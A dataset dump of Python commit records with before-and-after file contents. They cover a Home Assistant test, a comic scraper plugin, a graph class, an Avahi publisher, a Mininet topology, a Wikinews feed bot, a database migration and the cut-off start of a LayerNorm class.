z64/home-assistant,postlund/home-assistant,jawilson/home-assistant,happyleavesaoc/home-assistant,home-assistant/home-assistant,hmronline/home-assistant,kyvinh/home-assistant,Duoxilian/home-assistant,robbiet480/home-assistant,stefan-jonasson/home-assistant,joopert/home-assistant,luxus/home-assistant,ma314smith/home-assistant,happyleavesaoc/home-assistant,dmeulen/home-assistant,tboyce1/home-assistant,robjohnson189/home-assistant,Danielhiversen/home-assistant,mKeRix/home-assistant,Duoxilian/home-assistant,emilhetty/home-assistant,open-homeautomation/home-assistant,philipbl/home-assistant,miniconfig/home-assistant,shaftoe/home-assistant,dmeulen/home-assistant,Teagan42/home-assistant,w1ll1am23/home-assistant,aoakeson/home-assistant,stefan-jonasson/home-assistant,philipbl/home-assistant,adrienbrault/home-assistant,emilhetty/home-assistant,bdfoster/blumate,eagleamon/home-assistant,LinuxChristian/home-assistant,jaharkes/home-assistant,sdague/home-assistant,leoc/home-assistant,kyvinh/home-assistant,pschmitt/home-assistant,w1ll1am23/home-assistant,nkgilley/home-assistant,Teagan42/home-assistant,ct-23/home-assistant,leppa/home-assistant,MartinHjelmare/home-assistant,HydrelioxGitHub/home-assistant,aronsky/home-assistant,tboyce1/home-assistant,turbokongen/home-assistant,rohitranjan1991/home-assistant,shaftoe/home-assistant,stefan-jonasson/home-assistant,DavidLP/home-assistant,xifle/home-assistant,MungoRae/home-assistant,instantchow/home-assistant,ma314smith/home-assistant,hexxter/home-assistant,soldag/home-assistant,FreekingDean/home-assistant,oandrew/home-assistant,betrisey/home-assistant,DavidLP/home-assistant,mKeRix/home-assistant,coteyr/home-assistant,hmronline/home-assistant,sffjunkie/home-assistant,devdelay/home-assistant,MungoRae/home-assistant,ewandor/home-assistant,Julian/home-assistant,alexmogavero/home-assistant,Zyell/home-assistant,bdfoster/blumate,molobrakos/home-assistant,Zac-HD/home-assistant,keerts/home-assistant,qedi-r/home-assistant,hexxter/home-assistant,mKeRix/home-assistant,justyns/home-assistant,open-homeautomation/home-assistant,Danielhiversen/home-assistant,florianholzapfel/home-assistant,srcLurker/home-assistant,soldag/home-assistant,ct-23/home-assistant,partofthething/home-assistant,home-assistant/home-assistant,eagleamon/home-assistant,MartinHjelmare/home-assistant,toddeye/home-assistant,nugget/home-assistant,jaharkes/home-assistant,Smart-Torvy/torvy-home-assistant,leoc/home-assistant,varunr047/homefile,leppa/home-assistant,aoakeson/home-assistant,toddeye/home-assistant,xifle/home-assistant,justyns/home-assistant,nugget/home-assistant,jabesq/home-assistant,ewandor/home-assistant,tchellomello/home-assistant,xifle/home-assistant,philipbl/home-assistant,instantchow/home-assistant,titilambert/home-assistant,tinloaf/home-assistant,coteyr/home-assistant,nnic/home-assistant,oandrew/home-assistant,miniconfig/home-assistant,kennedyshead/home-assistant,persandstrom/home-assistant,sffjunkie/home-assistant,keerts/home-assistant,balloob/home-assistant,jnewland/home-assistant,Julian/home-assistant,jawilson/home-assistant,LinuxChristian/home-assistant,fbradyirl/home-assistant,bdfoster/blumate,aoakeson/home-assistant,shaftoe/home-assistant,nkgilley/home-assistant,philipbl/home-assistant,jnewland/home-assistant,pschmitt/home-assistant,ct-23/home-assistant,Zac-HD/home-assistant,alexmogavero/home-assistant,dmeulen/home-assistant,FreekingDean/home-assistant,ewandor/home-assistant,qedi-r/home-assistant,GenericStudent/home-assistant,persandstrom/home-assistant,oandrew/home-assistant,nnic/home-assistant,robbiet480/home-assistant,joopert/home-assistant,stefan-jonasson/home-assistant,Julian/home-assistant,robjohnson189/home-assistant,varunr047/homefile,emilhetty/home-assistant,aequitas/home-assistant,fbradyirl/home-assistant,open-homeautomation/home-assistant,mikaelboman/home-assistant,sander76/home-assistant,happyleavesaoc/home-assistant,morphis/home-assistant,jaharkes/home-assistant,LinuxChristian/home-assistant,molobrakos/home-assistant,Duoxilian/home-assistant,aequitas/home-assistant,Zac-HD/home-assistant,instantchow/home-assistant,florianholzapfel/home-assistant,lukas-hetzenecker/home-assistant,auduny/home-assistant,MartinHjelmare/home-assistant,auduny/home-assistant,kyvinh/home-assistant,jamespcole/home-assistant,hmronline/home-assistant,varunr047/homefile,jabesq/home-assistant,mezz64/home-assistant,florianholzapfel/home-assistant,Cinntax/home-assistant,DavidLP/home-assistant,morphis/home-assistant,luxus/home-assistant,molobrakos/home-assistant,hmronline/home-assistant,xifle/home-assistant,Smart-Torvy/torvy-home-assistant,deisi/home-assistant,sander76/home-assistant,betrisey/home-assistant,balloob/home-assistant,Julian/home-assistant,tboyce021/home-assistant,tboyce1/home-assistant,ma314smith/home-assistant,eagleamon/home-assistant,miniconfig/home-assistant,sffjunkie/home-assistant,dmeulen/home-assistant,HydrelioxGitHub/home-assistant,MungoRae/home-assistant,robjohnson189/home-assistant,HydrelioxGitHub/home-assistant,tinloaf/home-assistant,deisi/home-assistant,PetePriority/home-assistant,mikaelboman/home-assistant,betrisey/home-assistant,jaharkes/home-assistant,eagleamon/home-assistant,bdfoster/blumate,srcLurker/home-assistant,sffjunkie/home-assistant,varunr047/homefile,sffjunkie/home-assistant,persandstrom/home-assistant,betrisey/home-assistant,justyns/home-assistant,MungoRae/home-assistant,florianholzapfel/home-assistant,nnic/home-assistant,hexxter/home-assistant,devdelay/home-assistant,Smart-Torvy/torvy-home-assistant,Zac-HD/home-assistant,tboyce1/home-assistant,robjohnson189/home-assistant,titilambert/home-assistant,balloob/home-assistant,lukas-hetzenecker/home-assistant,luxus/home-assistant,partofthething/home-assistant,Zyell/home-assistant,LinuxChristian/home-assistant,ct-23/home-assistant,JshWright/home-assistant,tboyce021/home-assistant,tinloaf/home-assistant,Smart-Torvy/torvy-home-assistant,jamespcole/home-assistant,aronsky/home-assistant,turbokongen/home-assistant,open-homeautomation/home-assistant,mikaelboman/home-assistant,hexxter/home-assistant,Zyell/home-assistant | tests/components/garage_door/test_demo.py | tests/components/garage_door/test_demo.py | """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, RIGHT))
| """
tests.components.garage_door.test_demo
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests demo garage door component.
"""
import unittest
import homeassistant.core as ha
import homeassistant.components.garage_door as gd
LEFT = 'garage_door.left_garage_door'
RIGHT = 'garage_door.right_garage_door'
class TestGarageDoorDemo(unittest.TestCase):
""" Test the demo garage door. """
def setUp(self): # pylint: disable=invalid-name
self.hass = ha.HomeAssistant()
self.assertTrue(gd.setup(self.hass, {
'garage_door': {
'platform': 'demo'
}
}))
def tearDown(self): # pylint: disable=invalid-name
""" Stop down stuff we started. """
self.hass.stop()
def test_is_closed(self):
self.assertTrue(gd.is_closed(self.hass, LEFT))
self.hass.states.is_state(LEFT, 'close')
self.assertFalse(gd.is_closed(self.hass, RIGHT))
self.hass.states.is_state(RIGHT, 'open')
def test_open_door(self):
gd.open_door(self.hass, LEFT)
self.hass.pool.block_till_done()
self.assertTrue(gd.is_closed(self.hass, LEFT))
def test_close_door(self):
gd.close_door(self.hass, RIGHT)
self.hass.pool.block_till_done()
self.assertFalse(gd.is_closed(self.hass, RIGHT))
| mit | Python |
67d0d381003dc02d5e1eae9d0c8591daee4b93b3 | Migrate SnafuComics to single-class module. | webcomics/dosage,blade2005/dosage,peterjanes/dosage,peterjanes/dosage,webcomics/dosage,blade2005/dosage | dosagelib/plugins/snafu.py | dosagelib/plugins/snafu.py | # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name, path):
super(Snafu, self).__init__('SnafuComics/' + name)
self.url = 'http://snafu-comics.com/swmseries/' + path
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@classmethod
def getmodules(cls):
return [
cls('Braindead', 'braindead'),
cls('Bunnywith', 'bunnywith'),
cls('DeliverUsEvil', 'deliverusevil'),
cls('EA', 'ea'),
cls('FT', 'ft'),
cls('GrimTalesFromDownBelow', 'grimtales'),
cls('KOF', 'kof'),
cls('MyPanda', 'mypanda'),
cls('NarutoHeroesPath', 'naruto'),
cls('NewSuperMarioAdventures', 'nsma'),
cls('PowerPuffGirls', 'powerpuffgirls'),
# cls('PSG2', 'psg2'), -- Strangely broken
cls('SatansExcrement', 'satansexcrement'),
cls('SF', 'sf'),
cls('SkullBoy', 'skullboy'),
cls('Snafu', 'snafu'),
cls('Soul', 'soul'),
cls('Sugar', 'sugarbits'),
cls('SureToBeBanD', 'stbb'),
cls('TheLeague', 'league'),
cls('Tin', 'tin'),
cls('Titan', 'titan'),
cls('TrunksAndSoto', 'trunks-and-soto'),
cls('TW', 'tw'),
cls('Zim', 'zim'),
]
| # -*- coding: utf-8 -*-
# Copyright (C) 2004-2005 Tristan Seligmann and Jonathan Jacobs
# Copyright (C) 2012-2014 Bastian Kleineidam
# Copyright (C) 2015-2016 Tobias Gruetzmacher
from __future__ import absolute_import, division, print_function
from ..scraper import _ParserScraper
from ..helpers import indirectStarter
class _Snafu(_ParserScraper):
# Next and Previous are swapped...
prevSearch = '//a[@class="next"]'
imageSearch = '//div[@class="comicpage"]/img'
latestSearch = '//div[@id="feed"]/a'
starter = indirectStarter
def __init__(self, name):
super(_Snafu, self).__init__('SnafuComics/' + name)
def namer(self, image_url, page_url):
year, month, name = image_url.rsplit('/', 3)[1:]
return "%04s_%02s_%s" % (year, month, name)
@property
def url(self):
return 'http://snafu-comics.com/swmseries/' + self.path
class Braindead(_Snafu):
path = 'braindead'
class Bunnywith(_Snafu):
path = 'bunnywith'
class DeliverUsEvil(_Snafu):
path = 'deliverusevil'
class DigitalPurgatory(_Snafu):
path = 'digital-purgatory'
class EA(_Snafu):
path = 'ea'
class FT(_Snafu):
path = 'ft'
class GrimTalesFromDownBelow(_Snafu):
path = 'grimtales'
class KOF(_Snafu):
path = 'kof'
class MyPanda(_Snafu):
path = 'mypanda'
class NarutoHeroesPath(_Snafu):
path = 'naruto'
class NewSuperMarioAdventures(_Snafu):
path = 'nsma'
class PowerPuffGirls(_Snafu):
path = 'powerpuffgirls'
class PSG2(_Snafu):
path = 'psg2'
class SatansExcrement(_Snafu):
path = 'satansexcrement'
class SF(_Snafu):
path = 'sf'
class SkullBoy(_Snafu):
path = 'skullboy'
class Snafu(_Snafu):
path = 'snafu'
class Soul(_Snafu):
path = 'soul'
class Sugar(_Snafu):
path = 'sugarbits'
class SureToBeBanD(_Snafu):
path = 'stbb'
class TheLeague(_Snafu):
path = 'league'
class Tin(_Snafu):
path = 'tin'
class Titan(_Snafu):
path = 'titan'
class TrunksAndSoto(_Snafu):
path = 'trunks-and-soto'
class TW(_Snafu):
path = 'tw'
class Zim(_Snafu):
path = 'zim'
| mit | Python |
43cf23e793794fd45322471a52c83785070ac243 | add simple_graph | ndraper2/data-structures,SakiFu/data-structures | simple_graph.py | simple_graph.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
class Graph(object):
def __init__(self):
self.gdict = {}
def nodes(self):
return self.gdict.keys()
def edges(self):
self.edges = []
for node in self.gdict:
for end in self.gdict[node]:
self.edges.append((node, end))
return self.edges
def add_node(self, n):
self.gdict.setdefault(n, [])
def add_edge(self, n1, n2):
self.gdict[n1].setdefault(n2, [])
try:
self.gdict[n1].append(n2)
except KeyError:
self.gdict[n1] = [n2]
def del_node(self, n):
try:
del self.gdict[n1]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
for nodelist in self.gdit.values():
try:
nodelist.remove(n)
except ValueError:
continue
def del_edge(self, n1, n2):
try:
self.gdict[n1].remove[n2]
except KeyError, ValueError:
raise ValueError('Edge {}, {} not in the graph.'.format(n1, n2))
def has_node(self, n):
return n in self.gdict
def neighbors(self, n):
try:
return self.gdict[n]
except KeyError:
raise KeyError('{} not in the graph.'.format(n1))
def adjacent(self, n1, n2):
if n1 not in self.dict or n2 not in self.gdict:
raise KeyError('One of these nodes is not in the graph.')
return n2 in self.gdict[n1]
| mit | Python |
|
7d9b004b3fb33ed9f16ca657ddb6ee3ddf452802 | add dump2pe (t2_08 sample) | LRGH/elfesteem,LRGH/elfesteem | elfesteem/t2_08_dump2pe.py | elfesteem/t2_08_dump2pe.py | #! /usr/bin/env python
import pe
from pe_init import PE
import rlcompleter,readline,pdb, sys
from pprint import pprint as pp
readline.parse_and_bind("tab: complete")
import shlex
f = open('my_dump.txt', 'r')
for i in xrange(27):
f.readline()
state = 0
funcs = []
dll = ""
#parse imprec output
new_dll = []
while True:
l = f.readline()
if not l:
break
l = l.strip()
if state == 0 and l.startswith("FThunk"):
t = [r for r in shlex.shlex(l)]
ad = int(t[2], 16)
state = 1
continue
if state == 1:
t = [r for r in shlex.shlex(l)]
if not len(t):
new_dll.append(({"name":dll,
"firstthunk":ad},funcs[:] ))
dll = ""
funcs, state = [], 0
else:
dll = t[2]
funcs.append(t[6])
continue
pp(new_dll)
data = open('DUMP_00401000-00479000', 'rb').read()
e = PE()
e.DirImport.add_dlldesc(new_dll)
s_text = e.SHList.add_section(name = "text", addr = 0x1000, data = data)
s_myimp = e.SHList.add_section(name = "myimp", rawsize = len(e.DirImport))
e.DirImport.set_rva(s_myimp.addr)
e.Opthdr.Opthdr.AddressOfEntryPoint = s_text.addr
open('uu.bin', 'wb').write(str(e))
| lgpl-2.1 | Python |
|
0881e326a604977bcaf385db152a96826db52b74 | Add class for publishing a service on avahi | wizbit-archive/wizbit,wizbit-archive/wizbit | wizd/publish.py | wizd/publish.py | import dbus
import gobject
import avahi
import threading
import sys
from dbus.mainloop.glib import DBusGMainLoop
"""
Class for publishing a service on DNS-SD using Avahi.
Creates a thread to handle requests
"""
class ServicePublisher (threading.Thread):
def __init__(self, name, type, port, txt = "", domain = "", host = ""):
threading.Thread.__init__(self)
gobject.threads_init()
self._name = name
self._type = type
self._port = port
self._txt = txt
self._domain = ""
self._host = ""
self._group = None
self._rename_count = 12 # Counter so we only rename after collisions a sensible number of times
def run(self):
DBusGMainLoop( set_as_default=True )
self._main_loop = gobject.MainLoop()
self._bus = dbus.SystemBus()
self._server = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, avahi.DBUS_PATH_SERVER ),
avahi.DBUS_INTERFACE_SERVER )
self._server.connect_to_signal( "StateChanged", self._server_state_changed )
self._server_state_changed( self._server.GetState() )
self._main_loop.run()
if not self._group is None:
self._group.Free()
def stop(self):
self._main_loop.quit()
def _add_service(self):
if self._group is None:
self._group = dbus.Interface(
self._bus.get_object( avahi.DBUS_NAME, self._server.EntryGroupNew()),
avahi.DBUS_INTERFACE_ENTRY_GROUP)
self._group.connect_to_signal('StateChanged', self._entry_group_state_changed)
print "Adding service '%s' of type '%s' ..." % (self._name, self._type)
self._group.AddService(
avahi.IF_UNSPEC, #interface
avahi.PROTO_UNSPEC, #protocol
0, #flags
self._name, self._type,
self._domain, self._host,
dbus.UInt16(self._port),
avahi.string_array_to_txt_array(self._txt))
self._group.Commit()
def _remove_service(self):
if not self._group is None:
self._group.Reset()
def _server_state_changed(self, state):
if state == avahi.SERVER_COLLISION:
print "WARNING: Server name collision"
self._remove_service()
elif state == avahi.SERVER_RUNNING:
self._add_service()
def _entry_group_state_changed(self, state, error):
print "state change: %i" % state
if state == avahi.ENTRY_GROUP_ESTABLISHED:
print "Service established."
elif state == avahi.ENTRY_GROUP_COLLISION:
self._rename_count = self._rename_count - 1
if rename_count > 0:
name = server.GetAlternativeServiceName(name)
print "WARNING: Service name collision, changing name to '%s' ..." % name
self._remove_service()
self._add_service()
else:
print "ERROR: No suitable service name found after %i retries, exiting." % n_rename
self._main_loop.quit()
elif state == avahi.ENTRY_GROUP_FAILURE:
print "Error in group state changed", error
self._main_loop.quit()
return
if __name__ == "__main__":
sp = ServicePublisher("test","_test._tcp",1234)
sp.start()
chr = sys.stdin.read(1)
sp.stop()
| lgpl-2.1 | Python |
|
062b4d045580adaebf30376cae1b88387dc7f3bb | add test_db | xu6148152/WebApp-Python,xu6148152/WebApp-Python,xu6148152/WebApp-Python | www/test_deb.py | www/test_deb.py | # coding=utf-8
from www.models import User
from www.transwarp import db
__author__ = 'xubinggui'
db.create_engine(user='www-data', password='www-data', database='awesome')
u = User(name='Test', email='test@example.com', password='1234567890', image='about:blank')
u.insert()
print 'new user id:', u.id
u1 = User.find_first('where email=?', 'test@example.com')
print 'find user\'s name:', u1.name
u1.delete()
u2 = User.find_first('where email=?', 'test@example.com')
print 'find user:', u2 | mit | Python |
|
64c24ee2813e5d85866d14cfdee8258b91c09df6 | add debug topology file | bolshoibooze/hone,bolshoibooze/hone,pupeng/hone,bolshoibooze/hone,bolshoibooze/hone,pupeng/hone,pupeng/hone,pupeng/hone | evaluation/topo-fattree.py | evaluation/topo-fattree.py | """Custom topology example
Two directly connected switches plus a host for each switch:
host --- switch --- switch --- host
Adding the 'topos' dict with a key/value pair to generate our newly defined
topology enables one to pass in '--topo=mytopo' from the command line.
"""
from mininet.topo import Topo
class MyTopo( Topo ):
"Simple topology example."
def __init__( self ):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
host1 = self.addHost('h1')
host2 = self.addHost('h2')
host3 = self.addHost('h3')
host4 = self.addHost('h4')
host5 = self.addHost('h5')
host6 = self.addHost('h6')
host7 = self.addHost('h7')
host8 = self.addHost('h8')
switch1 = self.addSwitch('s1')
switch2 = self.addSwitch('s2')
switch3 = self.addSwitch('s3')
switch4 = self.addSwitch('s4')
switch5 = self.addSwitch('s5')
switch6 = self.addSwitch('s6')
switch7 = self.addSwitch('s7')
switch8 = self.addSwitch('s8')
switch9 = self.addSwitch('s9')
switch10 = self.addSwitch('s10')
# Add links
self.addLink(host1, switch1)
self.addLink(host2, switch1)
self.addLink(host3, switch2)
self.addLink(host4, switch2)
self.addLink(switch1, switch3)
self.addLink(switch1, switch4)
self.addLink(switch2, switch3)
self.addLink(switch2, switch4)
self.addLink(host5, switch5)
self.addLink(host6, switch5)
self.addLink(host7, switch6)
self.addLink(host8, switch6)
self.addLink(switch5, switch7)
self.addLink(switch5, switch8)
self.addLink(switch6, switch7)
self.addLink(switch6, switch8)
self.addLink(switch3, switch9)
self.addLink(switch3, switch10)
self.addLink(switch4, switch9)
self.addLink(switch4, switch10)
self.addLink(switch7, switch9)
self.addLink(switch7, switch10)
self.addLink(switch8, switch9)
self.addLink(switch8, switch10)
topos = { 'fattree': ( lambda: MyTopo() ) }
| bsd-3-clause | Python |
|
b3a16addda494428a69b80fe7d32b07520e1d292 | Create wikinews-updater.py | SiarheiGribov/pyBot,SiarheiGribov/pyBot | wikinews-updater.py | wikinews-updater.py | #!/usr/bin/env python
# -- coding: utf-8 --
import time
import requests
import login
wn_API = "https://ru.wikinews.org/w/api.php"
wp_API = "https://ru.wikipedia.org/w/api.php"
ua = {"User-agent": "pyBot/latestnews (toolforge/iluvatarbot; iluvatar@tools.wmflabs.org) requests (python3)"}
token, cookies = login.login(server="ru.wikipedia")
tasks = [
{"category": "Бизнес", "landing": "Проект:Компании/Викиновости/Бизнес", "count": 20},
{"category": "Екатеринбург", "landing": "Портал:Екатеринбург/Викиновости", "count": 7},
{"category": "Казань", "landing": "Портал:Казань/Викиновости", "count": 7},
{"category": "Музыка", "landing": "Портал:Музыка/Викиновости", "count": 10},
{"category": "ООН", "landing": "Портал:Организация Объединённых Наций/Викиновости", "count": 10},
{"category": "Республика Татарстан", "landing": "Портал:Татарстан/Викиновости", "count": 7},
{"category": "Санкт-Петербург", "landing": "Портал:Санкт-Петербург/Викиновости", "count": 10},
{"category": "Свердловская область", "landing": "Портал:Свердловская область/Викиновости", "count": 7},
{"category": "Урал", "landing": "Портал:Урал/Викиновости", "count": 7},
{"category": "Футбол", "landing": "Портал:Футбол/Викиновости", "count": 10},
{"category": "Хоккей с шайбой", "landing": "Портал:Хоккей/Викиновости/Хоккей с шайбой", "count": 10},
{"category": "Экономика", "landing": "Портал:Экономика/Викиновости", "count": 15}
]
def handler(members, task):
news = []
i = 0
for member in members:
if check(member["title"]):
i += 1
news.append("* {{news|" + str(member["title"]) + "}}")
if i >= task["count"]:
break
if len(news) > 0:
params = {
"action": "edit", "format": "json", "utf8": "1", "title": str(task["landing"]), "nocreate": 1,
"text": "\n".join(news), "summary": "Обновление ленты новостей", "token": token
}
requests.post(url=wp_API, data=params, cookies=cookies)
def check(page):
params = {
"action": "query", "format": "json", "utf8": "1", "prop": "templates", "titles": page, "tlnamespace": 10,
"tllimit": 500, "tltemplates": "Шаблон:Публиковать"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["pages"]
if len(res) > 0:
n = ""
for r in res:
n = r
break
if "templates" in res[n]:
if len(res[n]["templates"]) > 0:
return True
return False
def getData(task):
try:
params = {
"action": "query", "format": "json", "utf8": "1", "list": "categorymembers",
"cmtitle": "Категория:" + str(task["category"]), "cmprop": "timestamp|ids|title", "cmnamespace": 0,
"cmtype": "page", "cmlimit": 500, "cmsort": "timestamp", "cmdir": "older"
}
res = requests.post(url=wn_API, data=params, headers=ua).json()["query"]["categorymembers"]
except:
time.sleep(30)
getData()
else:
handler(res, task)
for task in tasks:
getData(task)
| mit | Python |
|
d0474ea69c9bcc5b07829603778e0277d1fd733a | fix moved Glottolog identifier of nepa1252 | clld/glottolog3,clld/glottolog3 | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | migrations/versions/1715ee79365_fix_missing_nepa1252_identifier.py | # coding=utf-8
"""fix missing nepa1252 identifier
Revision ID: 1715ee79365
Revises: 506dcac7d75
Create Date: 2015-04-15 19:34:27.655000
"""
# revision identifiers, used by Alembic.
revision = '1715ee79365'
down_revision = '506dcac7d75'
import datetime
from alembic import op
import sqlalchemy as sa
def upgrade():
id, name = 'nepa1252', 'Nepali'
insert_ident = sa.text('INSERT INTO identifier '
'(created, updated, active, version, type, description, lang, name) '
'SELECT now(), now(), true, 1, :type, :description, :lang, :name '
'WHERE NOT EXISTS (SELECT 1 FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name)'
).bindparams(type='name', description='Glottolog', lang='en')
insert_lang_ident = sa.text('INSERT INTO languageidentifier '
'(created, updated, active, version, language_pk, identifier_pk) '
'SELECT now(), now(), true, 1, '
'(SELECT pk FROM language WHERE id = :id), '
'(SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name) '
'WHERE NOT EXISTS (SELECT 1 FROM languageidentifier '
'WHERE language_pk = (SELECT pk FROM language WHERE id = :id) '
'AND identifier_pk = (SELECT pk FROM identifier WHERE type = :type '
'AND description = :description AND lang = :lang AND name = :name))'
).bindparams(type='name', description='Glottolog', lang='en')
op.execute(insert_ident.bindparams(name=name))
op.execute(insert_lang_ident.bindparams(id=id, name=name))
def downgrade():
pass
| mit | Python |
|
2749b4b754562c45a54b3df108c5c40c8d548038 | Create __init__.py | anvanza/invenavi,anvanza/invenavi,anvanza/invenavi | web/__init__.py | web/__init__.py | mit | Python |
||
1396ff4ab4e6664c265f97958951815a525f7823 | Remove confusing navigation tabs from header. | reddit/reddit-plugin-donate,madbook/reddit-plugin-donate,reddit/reddit-plugin-donate,madbook/reddit-plugin-donate,madbook/reddit-plugin-donate,reddit/reddit-plugin-donate | reddit_donate/pages.py | reddit_donate/pages.py | from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
def build_toolbars(self):
# get rid of tabs on the top
return []
class DonateLanding(Templated):
pass
| from r2.lib.pages import Reddit
from r2.lib.wrapped import Templated
class DonatePage(Reddit):
extra_stylesheets = Reddit.extra_stylesheets + ["donate.less"]
def __init__(self, title, content, **kwargs):
Reddit.__init__(
self,
title=title,
content=content,
show_sidebar=False,
**kwargs
)
class DonateLanding(Templated):
pass
| bsd-3-clause | Python |
307feb3f32fa31faa5754616a1e78c9ad03b0483 | test to demonstrate bug 538 | infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore,infowantstobeseen/pyglet-darwincore | tests/text/ELEMENT_CHANGE_STYLE.py | tests/text/ELEMENT_CHANGE_STYLE.py | #!/usr/bin/env python
'''Test that inline elements can have their style changed, even after text
has been deleted before them. [This triggers bug 538 if it has not yet been fixed.]
To run the test, delete the first line, one character at a time,
verifying that the element remains visible and no tracebacks are
printed to the console.
Press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import unittest
import pyglet
from pyglet.text import caret, document, layout
doctext = '''ELEMENT.py test document.
PLACE CURSOR AT THE END OF THE ABOVE LINE, AND DELETE ALL ITS TEXT,
BY PRESSING THE DELETE KEY REPEATEDLY.
IF THIS WORKS OK, AND THE ELEMENT (GRAY RECTANGLE) WITHIN THIS LINE
[element here]
REMAINS VISIBLE BETWEEN THE SAME CHARACTERS, WITH NO ASSERTIONS PRINTED TO
THE CONSOLE, THE TEST PASSES.
(In code with bug 538, the element sometimes moves within the text, and
eventually there is an assertion failure. Note that there is another bug,
unrelated to this one, which sometimes causes the first press of the delete
key to be ignored.)
Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Fusce venenatis
pharetra libero. Phasellus lacinia nisi feugiat felis. Sed id magna in nisl
cursus consectetuer. Aliquam aliquam lectus eu magna. Praesent sit amet ipsum
vitae nisl mattis commodo. Aenean pulvinar facilisis lectus. Phasellus sodales
risus sit amet lectus. Suspendisse in turpis. Vestibulum ac mi accumsan eros
commodo tincidunt. Nullam velit. In pulvinar, dui sit amet ullamcorper dictum,
dui risus ultricies nisl, a dignissim sapien enim sit amet tortor.
Pellentesque fringilla, massa sit amet bibendum blandit, pede leo commodo mi,
eleifend feugiat neque tortor dapibus mauris. Morbi nunc arcu, tincidunt vel,
blandit non, iaculis vel, libero. Vestibulum sed metus vel velit scelerisque
varius. Vivamus a tellus. Proin nec orci vel elit molestie venenatis. Aenean
fringilla, lorem vel fringilla bibendum, nibh mi varius mi, eget semper ipsum
ligula ut urna. Nullam tempor convallis augue. Sed at dui.
'''
element_index = doctext.index('[element here]')
doctext = doctext.replace('[element here]', '')
class TestElement(document.InlineElement):
vertex_list = None
def place(self, layout, x, y):
## assert layout.document.text[self._position] == '\x00'
### in bug 538, this fails after two characters are deleted.
self.vertex_list = layout.batch.add(4, pyglet.gl.GL_QUADS,
layout.top_group,
'v2i',
('c4B', [200, 200, 200, 255] * 4))
y += self.descent
w = self.advance
h = self.ascent - self.descent
self.vertex_list.vertices[:] = (x, y,
x + w, y,
x + w, y + h,
x, y + h)
def remove(self, layout):
self.vertex_list.delete()
del self.vertex_list
class TestWindow(pyglet.window.Window):
def __init__(self, *args, **kwargs):
super(TestWindow, self).__init__(*args, **kwargs)
self.batch = pyglet.graphics.Batch()
self.document = pyglet.text.decode_attributed(doctext)
for i in [element_index]:
self.document.insert_element(i, TestElement(60, -10, 70))
self.margin = 2
self.layout = layout.IncrementalTextLayout(self.document,
self.width - self.margin * 2, self.height - self.margin * 2,
multiline=True,
batch=self.batch)
self.caret = caret.Caret(self.layout)
self.push_handlers(self.caret)
self.set_mouse_cursor(self.get_system_mouse_cursor('text'))
def on_draw(self):
pyglet.gl.glClearColor(1, 1, 1, 1)
self.clear()
self.batch.draw()
def on_key_press(self, symbol, modifiers):
super(TestWindow, self).on_key_press(symbol, modifiers)
if symbol == pyglet.window.key.TAB:
self.caret.on_text('\t')
self.document.set_style(0, len(self.document.text), dict(bold = None)) ### trigger bug 538
class TestCase(unittest.TestCase):
def test(self):
self.window = TestWindow(##resizable=True,
visible=False)
self.window.set_visible()
pyglet.app.run()
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python |
|
3df697b29931025a9c6f3f809eda2260d4211305 | Add LayerNorm class | spacy-io/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc,explosion/thinc,spacy-io/thinc,explosion/thinc | thinc/neural/_classes/layernorm.py | thinc/neural/_classes/layernorm.py | from ... import describe
from .model import Model
def _init_to_one(W, ops):
W.fill(1.)
def _run_child_hooks(model, X, y=None):
for hook in model.child.on_data_hooks:
hook(model.child, X, y)
model.nO = model.child.nO
@describe.on_data(_run_child_hooks)
@describe.attributes(
G=describe.Weights("Scaling vector",
lambda obj: (obj.nO,), _init_to_one),
b=describe.Biases("Bias vector",
